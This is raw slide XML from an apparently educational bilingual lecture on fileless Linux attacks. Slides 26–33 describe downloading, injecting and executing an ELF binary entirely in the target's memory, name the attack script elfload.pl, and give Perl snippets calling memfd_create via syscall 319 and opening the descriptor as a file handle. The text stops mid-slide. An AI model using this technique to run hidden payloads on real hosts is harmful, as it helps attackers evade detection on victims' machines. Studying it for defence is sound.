              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>target host. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>a result, the download operation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>injection operation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, and execution operation all occurs in memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>target host.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26</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Execution Flow</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3575553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3600" dirty="0" smtClean="0"/>
              <a:t>Detailed Steps </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>itw01.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a: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68893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Stuart case: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>elfload.pl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Itw01 case: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>elfload.pl</a:t>
            </a:r>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28</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Names of Attack Perl Scripts</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1141160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Part 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>建立記憶體匿名檔案並寫入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案內容 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Part 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>二進制檔案寫入到建立的檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>當中。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Part 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>呼叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>函式執行該匿名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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29</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Operation Steps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>itw01.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402790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3600" dirty="0" smtClean="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="36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42127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dirty="0" smtClean="0"/>
              <a:t>Part 1</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30</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541979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pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(name, MFD_CLOEXEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Perl equivalent of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>the above C statement </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>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my $name = "";</a:t>
            </a:r>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my $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(319, $name, 1);</a:t>
            </a:r>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if (-1 == $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>die</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: $!";</a:t>
            </a:r>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a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A7441"/>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31</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Invoke </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> in Perl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2901712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2675467"/>
            <a:ext cx="8712968" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Perl’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>which is normally used to open files, can also be used to turn an already-open file descriptor into a file handle by specifying something like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&amp;=X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is a file descriptor) instead of a file name. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>We’ll also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>want to enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>autoflush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> on the new file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>handle.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>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open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>my</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $FH, '&gt;&amp;='.$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) or die "open: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>$!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select((select($FH), $|=1)[0]);</a:t>
            </a:r>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32</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>From an Already-open File Descriptor to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>File Handle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="989284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D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="239240"/>
            <a:ext cx="8229600" cy="453456"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
